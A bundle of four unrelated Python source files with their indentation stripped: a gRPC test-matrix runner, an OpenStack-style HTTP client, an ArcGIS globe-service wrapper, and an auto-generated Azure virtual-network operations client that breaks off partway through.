test_jobs += _generate_jobs(languages=['c++'],
configs=['tsan'],
platforms=['linux'],
arch='x64',
compiler='clang7.0',
labels=['sanitizers', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_TSAN_RUNTESTS_TIMEOUT)
return test_jobs
def _create_portability_test_jobs(extra_args=[],
inner_jobs=_DEFAULT_INNER_JOBS):
test_jobs = []
# portability C x86
test_jobs += _generate_jobs(languages=['c'],
configs=['dbg'],
platforms=['linux'],
arch='x86',
compiler='default',
labels=['portability', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs)
# portability C and C++ on x64
for compiler in [
'gcc4.9', 'gcc5.3', 'gcc7.4', 'gcc8.3', 'gcc_musl', 'clang3.5',
'clang3.6', 'clang3.7', 'clang7.0'
]:
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['linux'],
arch='x64',
compiler=compiler,
labels=['portability', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# portability C on Windows 64-bit (x86 is the default)
test_jobs += _generate_jobs(languages=['c'],
configs=['dbg'],
platforms=['windows'],
arch='x64',
compiler='default',
labels=['portability', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs)
# portability C++ on Windows
# TODO(jtattermusch): some of the tests are failing, so we force --build_only
test_jobs += _generate_jobs(languages=['c++'],
configs=['dbg'],
platforms=['windows'],
arch='default',
compiler='default',
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# portability C and C++ on Windows using VS2017 (build only)
# TODO(jtattermusch): some of the tests are failing, so we force --build_only
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['windows'],
arch='x64',
compiler='cmake_vs2017',
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# C and C++ with the c-ares DNS resolver on Linux
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['linux'],
labels=['portability', 'corelang'],
extra_args=extra_args,
extra_envs={'GRPC_DNS_RESOLVER': 'ares'},
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# C and C++ with no-exceptions on Linux
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['noexcept'],
platforms=['linux'],
labels=['portability', 'corelang'],
extra_args=extra_args,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# TODO(zyc): Turn on this test after adding c-ares support on windows.
# C with the c-ares DNS resolver on Windows
# test_jobs += _generate_jobs(languages=['c'],
# configs=['dbg'], platforms=['windows'],
# labels=['portability', 'corelang'],
# extra_args=extra_args,
# extra_envs={'GRPC_DNS_RESOLVER': 'ares'})
# C and C++ build with cmake on Linux
# TODO(jtattermusch): some of the tests are failing, so we force --build_only
# to make sure it's buildable at least.
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['linux'],
arch='default',
compiler='cmake',
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs)
test_jobs += _generate_jobs(languages=['python'],
configs=['dbg'],
platforms=['linux'],
arch='default',
compiler='python_alpine',
labels=['portability', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# TODO(jtattermusch): a large portion of the libuv tests is failing,
# which can end up killing the kokoro job due to gigabytes of error logs
# generated. Remove the --build_only flag
# once https://github.com/grpc/grpc/issues/17556 is fixed.
test_jobs += _generate_jobs(languages=['c'],
configs=['dbg'],
platforms=['linux'],
iomgr_platforms=['uv'],
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
return test_jobs
def _allowed_labels():
"""Returns a list of existing job labels."""
all_labels = set()
for job in _create_test_jobs() + _create_portability_test_jobs():
for label in job.labels:
all_labels.add(label)
return sorted(all_labels)
def _runs_per_test_type(arg_str):
"""Auxiliary function to parse the "runs_per_test" flag."""
try:
n = int(arg_str)
if n <= 0: raise ValueError
return n
except ValueError:
msg = '\'{}\' is not a positive integer'.format(arg_str)
raise argparse.ArgumentTypeError(msg)
if __name__ == "__main__":
argp = argparse.ArgumentParser(
description='Run a matrix of run_tests.py tests.')
argp.add_argument('-j',
'--jobs',
default=multiprocessing.cpu_count() // _DEFAULT_INNER_JOBS,
type=int,
help='Number of concurrent run_tests.py instances.')
argp.add_argument('-f',
'--filter',
choices=_allowed_labels(),
nargs='+',
default=[],
help='Filter targets to run by label with AND semantics.')
argp.add_argument('--exclude',
choices=_allowed_labels(),
nargs='+',
default=[],
help='Exclude targets with any of given labels.')
argp.add_argument('--build_only',
default=False,
action='store_const',
const=True,
help='Pass --build_only flag to run_tests.py instances.')
argp.add_argument(
'--force_default_poller',
default=False,
action='store_const',
const=True,
help='Pass --force_default_poller to run_tests.py instances.')
argp.add_argument('--dry_run',
default=False,
action='store_const',
const=True,
help='Only print what would be run.')
argp.add_argument(
'--filter_pr_tests',
default=False,
action='store_const',
const=True,
help='Filters out tests irrelevant to pull request changes.')
argp.add_argument(
'--base_branch',
default='origin/master',
type=str,
help='Branch that pull request is requesting to merge into')
argp.add_argument('--inner_jobs',
default=_DEFAULT_INNER_JOBS,
type=int,
help='Number of jobs in each run_tests.py instance')
argp.add_argument(
'-n',
'--runs_per_test',
default=1,
type=_runs_per_test_type,
help='How many times to run each test. >1 runs implies ' +
'omitting passing tests from the output & reports.')
argp.add_argument('--max_time',
default=-1,
type=int,
help='Maximum amount of time to run tests for ' +
'(other tests will be skipped)')
argp.add_argument(
'--internal_ci',
default=False,
action='store_const',
const=True,
help=
'(Deprecated, has no effect) Put reports into subdirectories to improve presentation of '
'results by Kokoro.')
argp.add_argument('--bq_result_table',
default='',
type=str,
nargs='?',
help='Upload test results to a specified BQ table.')
argp.add_argument('--extra_args',
default='',
type=str,
nargs=argparse.REMAINDER,
help='Extra test args passed to each sub-script.')
args = argp.parse_args()
extra_args = []
if args.build_only:
extra_args.append('--build_only')
if args.force_default_poller:
extra_args.append('--force_default_poller')
if args.runs_per_test > 1:
extra_args.append('-n')
extra_args.append('%s' % args.runs_per_test)
extra_args.append('--quiet_success')
if args.max_time > 0:
extra_args.extend(('--max_time', '%d' % args.max_time))
if args.bq_result_table:
extra_args.append('--bq_result_table')
extra_args.append('%s' % args.bq_result_table)
extra_args.append('--measure_cpu_costs')
if args.extra_args:
extra_args.extend(args.extra_args)
all_jobs = _create_test_jobs(extra_args=extra_args, inner_jobs=args.inner_jobs) + \
_create_portability_test_jobs(extra_args=extra_args, inner_jobs=args.inner_jobs)
jobs = []
for job in all_jobs:
if not args.filter or all(
filter in job.labels for filter in args.filter):
if not any(exclude_label in job.labels
for exclude_label in args.exclude):
jobs.append(job)
if not jobs:
jobset.message('FAILED',
'No test suites match given criteria.',
do_newline=True)
sys.exit(1)
print('IMPORTANT: The changes you are testing need to be locally committed')
print('because only the committed changes in the current branch will be')
print('copied to the docker environment or into subworkspaces.')
skipped_jobs = []
if args.filter_pr_tests:
print('Looking for irrelevant tests to skip...')
relevant_jobs = filter_tests(jobs, args.base_branch)
if len(relevant_jobs) == len(jobs):
print('No tests will be skipped.')
else:
print('These tests will be skipped:')
skipped_jobs = list(set(jobs) - set(relevant_jobs))
# Sort by shortnames to make printing of skipped tests consistent
skipped_jobs.sort(key=lambda job: job.shortname)
for job in list(skipped_jobs):
print(' %s' % job.shortname)
jobs = relevant_jobs
print('Will run these tests:')
for job in jobs:
print(' %s: "%s"' % (job.shortname, ' '.join(job.cmdline)))
print('')
if args.dry_run:
print('--dry_run was used, exiting')
sys.exit(1)
jobset.message('START', 'Running test matrix.', do_newline=True)
num_failures, resultset = jobset.run(jobs,
newline_on_success=True,
travis=True,
maxjobs=args.jobs)
# Merge skipped tests into results to show skipped tests on report.xml
if skipped_jobs:
ignored_num_skipped_failures, skipped_results = jobset.run(
skipped_jobs, skip_jobs=True)
resultset.update(skipped_results)
report_utils.render_junit_xml_report(resultset,
_report_filename(_MATRIX_REPORT_NAME),
suite_name=_MATRIX_REPORT_NAME,
multi_target=True)
if num_failures == 0:
jobset.message('SUCCESS',
'All run_tests.py instances finished successfully.',
do_newline=True)
else:
jobset.message('FAILED',
'Some run_tests.py instances have failed.',
do_newline=True)
sys.exit(1)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2013 Alessio Ababilov
# Copyright 2013 Grid Dynamics
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
OpenStack Client interface. Handles the REST calls and responses.
"""
# E0202: An attribute inherited from %s hide this method
# pylint: disable=E0202
import logging
import time
try:
import simplejson as json
except ImportError:
import json
import requests
from automationclient.openstack.common.apiclient import exceptions
from automationclient.openstack.common import importutils
_logger = logging.getLogger(__name__)
class HTTPClient(object):
"""This client handles sending HTTP requests to OpenStack servers.
Features:
- share authentication information between several clients to different
services (e.g., for compute and image clients);
- reissue authentication request for expired tokens;
- encode/decode JSON bodies;
- raise exceptions on HTTP errors;
- pluggable authentication;
- store authentication information in a keyring;
- store time spent for requests;
- register clients for particular services, so one can use
`http_client.identity` or `http_client.compute`;
- log requests and responses in a format that is easy to copy-and-paste
into terminal and send the same request with curl.
"""
user_agent = "automationclient.openstack.common.apiclient"
def __init__(self,
auth_plugin,
region_name=None,
endpoint_type="publicURL",
original_ip=None,
verify=True,
cert=None,
timeout=None,
timings=False,
keyring_saver=None,
debug=False,
user_agent=None,
http=None):
self.auth_plugin = auth_plugin
self.endpoint_type = endpoint_type
self.region_name = region_name
self.original_ip = original_ip
self.timeout = timeout
self.verify = verify
self.cert = cert
self.keyring_saver = keyring_saver
self.debug = debug
self.user_agent = user_agent or self.user_agent
self.times = [] # [("item", starttime, endtime), ...]
self.timings = timings
# requests within the same session can reuse TCP connections from pool
self.http = http or requests.Session()
self.cached_token = None
def _http_log_req(self, method, url, kwargs):
if not self.debug:
return
string_parts = [
"curl -i",
"-X '%s'" % method,
"'%s'" % url,
]
for element in kwargs['headers']:
header = "-H '%s: %s'" % (element, kwargs['headers'][element])
string_parts.append(header)
_logger.debug("REQ: %s" % " ".join(string_parts))
if 'data' in kwargs:
_logger.debug("REQ BODY: %s\n" % (kwargs['data']))
def _http_log_resp(self, resp):
if not self.debug:
return
_logger.debug(
"RESP: [%s] %s\n",
resp.status_code,
resp.headers)
if resp._content_consumed:
_logger.debug(
"RESP BODY: %s\n",
resp.text)
def serialize(self, kwargs):
if kwargs.get('json') is not None:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = json.dumps(kwargs['json'])
try:
del kwargs['json']
except KeyError:
pass
def get_timings(self):
return self.times
def reset_timings(self):
self.times = []
def request(self, method, url, **kwargs):
"""Send an http request with the specified characteristics.
Wrapper around `requests.Session.request` to handle tasks such as
setting headers, JSON encoding/decoding, and error handling.
:param method: method of HTTP request
:param url: URL of HTTP request
:param kwargs: any other parameter that can be passed to
`requests.Session.request` (such as `headers`) or `json`
that will be encoded as JSON and used as `data` argument
"""
kwargs.setdefault("headers", kwargs.get("headers", {}))
kwargs["headers"]["User-Agent"] = self.user_agent
if self.original_ip:
kwargs["headers"]["Forwarded"] = "for=%s;by=%s" % (
self.original_ip, self.user_agent)
if self.timeout is not None:
kwargs.setdefault("timeout", self.timeout)
kwargs.setdefault("verify", self.verify)
if self.cert is not None:
kwargs.setdefault("cert", self.cert)
self.serialize(kwargs)
self._http_log_req(method, url, kwargs)
if self.timings:
start_time = time.time()
resp = self.http.request(method, url, **kwargs)
if self.timings:
self.times.append(("%s %s" % (method, url),
start_time, time.time()))
self._http_log_resp(resp)
if resp.status_code >= 400:
_logger.debug(
"Request returned failure status: %s",
resp.status_code)
raise exceptions.from_response(resp, method, url)
return resp
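# Illustrative sketch of request() (assumes an auth plugin instance `auth`
# constructed elsewhere; the URL is hypothetical):
#
#     http = HTTPClient(auth, timings=True, debug=True)
#     resp = http.request("POST", "http://compute.example.org/v2/servers",
#                         json={"server": {"name": "demo"}})
#     # serialize() turns the `json` kwarg into a `data` body and sets the
#     # Content-Type header to application/json before sending.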
@staticmethod
def concat_url(endpoint, url):
"""Concatenate endpoint and final URL.
E.g., "http://keystone/v2.0/" and "/tokens" are concatenated to
"http://keystone/v2.0/tokens".
:param endpoint: the base URL
:param url: the final URL
"""
return "%s/%s" % (endpoint.rstrip("/"), url.strip("/"))
def client_request(self, client, method, url, **kwargs):
"""Send an http request using `client`'s endpoint and specified `url`.
If request was rejected as unauthorized (possibly because the token is
expired), issue one authorization attempt and send the request once
again.
:param client: instance of BaseClient descendant
:param method: method of HTTP request
:param url: URL of HTTP request
:param kwargs: any other parameter that can be passed to
`HTTPClient.request`
"""
filter_args = {
"endpoint_type": client.endpoint_type or self.endpoint_type,
"service_type": client.service_type,
}
token, endpoint = (self.cached_token, client.cached_endpoint)
just_authenticated = False
if not (token and endpoint):
try:
token, endpoint = self.auth_plugin.token_and_endpoint(
**filter_args)
except exceptions.EndpointException:
pass
if not (token and endpoint):
self.authenticate()
just_authenticated = True
token, endpoint = self.auth_plugin.token_and_endpoint(
**filter_args)
if not (token and endpoint):
raise exceptions.AuthorizationFailure(
"Cannot find endpoint or token for request")
old_token_endpoint = (token, endpoint)
kwargs.setdefault("headers", {})["X-Auth-Token"] = token
self.cached_token = token
client.cached_endpoint = endpoint
# Perform the request once. If we get Unauthorized, then it
# might be because the auth token expired, so try to
# re-authenticate and try again. If it still fails, bail.
try:
return self.request(
method, self.concat_url(endpoint, url), **kwargs)
except exceptions.Unauthorized as unauth_ex:
if just_authenticated:
raise
self.cached_token = None
client.cached_endpoint = None
self.authenticate()
try:
token, endpoint = self.auth_plugin.token_and_endpoint(
**filter_args)
except exceptions.EndpointException:
raise unauth_ex
if (not (token and endpoint) or
old_token_endpoint == (token, endpoint)):
raise unauth_ex
self.cached_token = token
client.cached_endpoint = endpoint
kwargs["headers"]["X-Auth-Token"] = token
return self.request(
method, self.concat_url(endpoint, url), **kwargs)
def add_client(self, base_client_instance):
"""Add a new instance of :class:`BaseClient` descendant.
`self` will store a reference to `base_client_instance`.
Example:
>>> def test_clients():
... from keystoneclient.auth import keystone
... from openstack.common.apiclient import client
... auth = keystone.KeystoneAuthPlugin(
... username="user", password="pass", tenant_name="tenant",
... auth_url="http://auth:5000/v2.0")
... openstack_client = client.HTTPClient(auth)
... # create nova client
... from novaclient.v1_1 import client
... client.Client(openstack_client)
... # create keystone client
... from keystoneclient.v2_0 import client
... client.Client(openstack_client)
... # use them
... openstack_client.identity.tenants.list()
... openstack_client.compute.servers.list()
"""
service_type = base_client_instance.service_type
if service_type and not hasattr(self, service_type):
setattr(self, service_type, base_client_instance)
def authenticate(self):
self.auth_plugin.authenticate(self)
# Store the authentication results in the keyring for later requests
if self.keyring_saver:
self.keyring_saver.save(self)
class BaseClient(object):
"""Top-level object to access the OpenStack API.
This client uses :class:`HTTPClient` to send requests. :class:`HTTPClient`
will handle a bunch of issues such as authentication.
"""
service_type = None
endpoint_type = None # "publicURL" will be used
cached_endpoint = None
def __init__(self, http_client, extensions=None):
self.http_client = http_client
http_client.add_client(self)
# Add in any extensions...
if extensions:
for extension in extensions:
if extension.manager_class:
setattr(self, extension.name,
extension.manager_class(self))
def client_request(self, method, url, **kwargs):
return self.http_client.client_request(
self, method, url, **kwargs)
def head(self, url, **kwargs):
return self.client_request("HEAD", url, **kwargs)
def get(self, url, **kwargs):
return self.client_request("GET", url, **kwargs)
def post(self, url, **kwargs):
return self.client_request("POST", url, **kwargs)
def put(self, url, **kwargs):
return self.client_request("PUT", url, **kwargs)
def delete(self, url, **kwargs):
return self.client_request("DELETE", url, **kwargs)
def patch(self, url, **kwargs):
return self.client_request("PATCH", url, **kwargs)
@staticmethod
def get_class(api_name, version, version_map):
"""Returns the client class for the requested API version
:param api_name: the name of the API, e.g. 'compute', 'image', etc
:param version: the requested API version
:param version_map: a dict of client classes keyed by version
:rtype: a client class for the requested API version
"""
try:
client_path = version_map[str(version)]
except (KeyError, ValueError):
msg = "Invalid %s client version '%s'. must be one of: %s" % (
(api_name, version, ', '.join(version_map.keys())))
raise exceptions.UnsupportedVersion(msg)
return importutils.import_class(client_path)
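# Illustrative sketch of get_class() (hypothetical version map and module path):
#
#     version_map = {'1': 'automationclient.v1.client.Client'}
#     client_cls = BaseClient.get_class('automation', 1, version_map)
#     # raises exceptions.UnsupportedVersion for versions missing from the map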
|
|
from .._abstract.abstract import BaseSecurityHandler, BaseAGSServer
from ..security.security import AGSTokenSecurityHandler
import json, types
########################################################################
class GlobeServiceLayer(BaseAGSServer):
"""
Represents a single globe layer
"""
_url = None
_proxy_url = None
_proxy_port = None
_securityHandler = None
_json = None
_json_dict = None
_extent = None
_displayField = None
_baseOption = None
_name = None
_baseID = None
_dataType = None
_fields = None
_cullMode = None
_defaultVisibility = None
_copyrightText = None
_extrusionExpression = None
_currentVersion = None
_subLayers = None
_minDistance = None
_type = None
_samplingMode = None
_maxDistance = None
_id = None
_layerFolderName = None
#----------------------------------------------------------------------
def __init__(self, url,
securityHandler=None,
proxy_url=None,
proxy_port=None,
initialize=False):
"""Constructor"""
self._url = url
self._securityHandler = securityHandler
if self._securityHandler is not None:
self._referer_url = securityHandler.referer_url
self._proxy_port = proxy_port
self._proxy_url = proxy_url
if initialize:
self.__init()
#----------------------------------------------------------------------
def __init(self):
""" inializes the properties """
params = {
"f" : "json",
}
json_dict = self._do_get(self._url, params,
securityHandler=self._securityHandler,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._json_dict = json_dict
self._json = json.dumps(self._json_dict)
attributes = [attr for attr in dir(self)
if not attr.startswith('__') and \
not attr.startswith('_')]
for k,v in json_dict.iteritems():
if k in attributes:
setattr(self, "_"+ k, v)
else:
print k, " - attribute not implemented for Globe Service Layer."
#----------------------------------------------------------------------
def __str__(self):
"""returns object as string"""
if self._json is None:
self.__init()
return self._json
#----------------------------------------------------------------------
def __iter__(self):
"""
returns key/value pair
"""
attributes = json.loads(str(self))
for att in attributes.keys():
yield (att, getattr(self, att))
#----------------------------------------------------------------------
@property
def extent(self):
"""returns the globe layer extent"""
if self._extent is None:
self.__init()
return self._extent
#----------------------------------------------------------------------
@property
def displayField(self):
"""returns the layer's display field"""
if self._displayField is None:
self.__init()
return self._displayField
#----------------------------------------------------------------------
@property
def baseOption(self):
"""returns the base option"""
if self._baseOption is None:
self.__init()
return self._baseOption
#----------------------------------------------------------------------
@property
def name(self):
"""returns the layers' name"""
if self._name is None:
self.__init()
return self._name
#----------------------------------------------------------------------
@property
def baseID(self):
"""returns the layers' base ID"""
if self._baseID is None:
self.__init()
return self._baseID
#----------------------------------------------------------------------
@property
def dataType(self):
"""returns the data type for the layer"""
if self._dataType is None:
self.__init()
return self._dataType
#----------------------------------------------------------------------
@property
def fields(self):
"""returns the fields"""
if self._fields is None:
self.__init()
return self._fields
#----------------------------------------------------------------------
@property
def cullMode(self):
"""returns cull mode"""
if self._cullMode is None:
self.__init()
return self._cullMode
#----------------------------------------------------------------------
@property
def defaultVisibility(self):
"""returns the defaultVisibility value"""
if self._defaultVisibility is None:
self.__init()
return self._defaultVisibility
#----------------------------------------------------------------------
@property
def copyrightText(self):
"""returns the copyright text"""
if self._copyrightText is None:
self.__init()
return self._copyrightText
#----------------------------------------------------------------------
@property
def extrusionExpression(self):
"""returns the extrusionExpression value"""
if self._extrusionExpression is None:
self.__init()
return self._extrusionExpression
#----------------------------------------------------------------------
@property
def currentVersion(self):
"""returns the currentVersion value"""
if self._currentVersion is None:
self.__init()
return self._currentVersion
#----------------------------------------------------------------------
@property
def subLayers(self):
"""returns the subLayers value"""
if self._subLayers is None:
self.__init()
return self._subLayers
#----------------------------------------------------------------------
@property
def minDistance(self):
"""returns the min distance value"""
if self._minDistance is None:
self.__init()
return self._minDistance
#----------------------------------------------------------------------
@property
def type(self):
"""returns the type"""
if self._type is None:
self.__init()
return self._type
#----------------------------------------------------------------------
@property
def samplingMode(self):
"""returns the sampling mode"""
if self._samplingMode is None:
self.__init()
return self._samplingMode
#----------------------------------------------------------------------
@property
def maxDistance(self):
"""returns the maximum distance"""
if self._maxDistance is None:
self.__init()
return self._maxDistance
#----------------------------------------------------------------------
@property
def id(self):
"""returns the id value"""
if self._id is None:
self.__init()
return self._id
#----------------------------------------------------------------------
@property
def layerFolderName(self):
"""returns the layer folder name"""
if self._layerFolderName is None:
self.__init()
return self._layerFolderName
########################################################################
class GlobeService(BaseAGSServer):
"""
The Globe Service resource represents a globe service published with
ArcGIS for Server. The resource provides information about the service
such as the service description and the various layers contained in the
published globe document.
"""
_url = None
_securityHandler = None
_proxy_url = None
_proxy_port = None
_json = None
_json_dict = None
_currentVersion = None
_layers = None
_serviceDescription = None
_documentInfo = None
#----------------------------------------------------------------------
def __init__(self, url,
securityHandler=None,
proxy_url=None,
proxy_port=None,
initialize=False):
"""Constructor"""
self._url = url
self._securityHandler = securityHandler
self._proxy_url = proxy_url
self._proxy_port = proxy_port
if initialize:
self.__init()
#----------------------------------------------------------------------
def __init(self):
""" inializes the properties """
params = {
"f" : "json",
}
json_dict = self._do_get(self._url, params,
securityHandler=self._securityHandler,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._json_dict = json_dict
self._json = json.dumps(self._json_dict)
attributes = [attr for attr in dir(self)
if not attr.startswith('__') and \
not attr.startswith('_')]
for k,v in json_dict.iteritems():
if k in attributes:
setattr(self, "_"+ k, v)
else:
print k, " - attribute not implemented for Globe Service."
#----------------------------------------------------------------------
def __str__(self):
"""returns object as string"""
if self._json is None:
self.__init()
return self._json
#----------------------------------------------------------------------
def __iter__(self):
"""
returns key/value pair
"""
attributes = ["currentVersion",
"documentInfo",
"layers",
"serviceDescription"]
for att in attributes:
yield (att, getattr(self, att))
#----------------------------------------------------------------------
@property
def layers(self):
"""gets the globe service layers"""
if self._layers is None:
self.__init()
lyrs = []
for lyr in self._layers:
lyr['object'] = GlobeServiceLayer(url=self._url + "/%s" % lyr['id'],
securityHandler=self._securityHandler,
proxy_port=self._proxy_port,
proxy_url=self._proxy_url)
lyrs.append(lyr)
return lyrs
#----------------------------------------------------------------------
@property
def currentVersion(self):
"""returns the service current version"""
if self._currentVersion is None:
self.__init()
return self._currentVersion
#----------------------------------------------------------------------
@property
def serviceDescription(self):
"""returns the service current version"""
if self._serviceDescription is None:
self.__init()
return self._serviceDescription
#----------------------------------------------------------------------
@property
def documentInfo(self):
"""returns the service document information"""
if self._documentInfo is None:
self.__init()
return self._documentInfo
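# Illustrative usage sketch (hypothetical ArcGIS Server URL; Python 2 syntax
# to match this module):
#
#     gs = GlobeService(url="https://server.example.com/arcgis/rest/services/Sample/GlobeServer")
#     print gs.serviceDescription
#     for lyr in gs.layers:
#         print lyr['object'].name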
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VirtualNetworksOperations(object):
"""VirtualNetworksOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-10-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-10-01"
self.config = config
def _delete_initial(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def get(
self, resource_group_name, virtual_network_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified virtual network by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param expand: Expands referenced resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VirtualNetwork or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_10_01.models.VirtualNetwork or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def _create_or_update_initial(
self, resource_group_name, virtual_network_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
